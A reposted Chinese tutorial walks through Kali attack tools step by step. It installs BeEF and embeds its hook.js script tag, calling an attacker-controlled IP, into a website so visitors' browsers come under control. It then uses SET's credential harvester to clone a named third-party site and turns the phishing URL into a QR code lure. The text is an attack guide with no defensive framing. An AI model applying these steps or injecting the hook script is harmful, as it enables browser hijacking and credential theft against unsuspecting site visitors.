本文轉自行云博客https://www.xy586.top
beef-xss
安裝beef-xss:apt install beef-xss
安裝完成之后運行beef-xss:

登錄網址:http://192.168.232.138:3000/ui/authentication

將beef-xss生成的js代碼,放入網站中
<script src="http://192.168.232.138:3000/hook.js"></script>
被攻擊目標打開網頁鏈接,則beef中得到該電腦控制

setoolkit:
kali自帶setoolkit,終端直接輸入setoolkit運行
選擇1

接著選擇2,web攻擊:

選擇3)credential harvester attack method:

選擇2)site cloner:

IP默認,克隆網站:http://www.51bb0.cn

登錄IP,克隆成功

還可使用setoolkit將網頁URL生成二維碼,
選擇8)QRCode Generator Attack Vectors:

輸入網址:www.51bbO.cn生成二維碼

在/root/.set/reports檔案夾下,將生成的二維碼匯出:
sz qrcode_attack.png
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/100742.html
標籤:其他
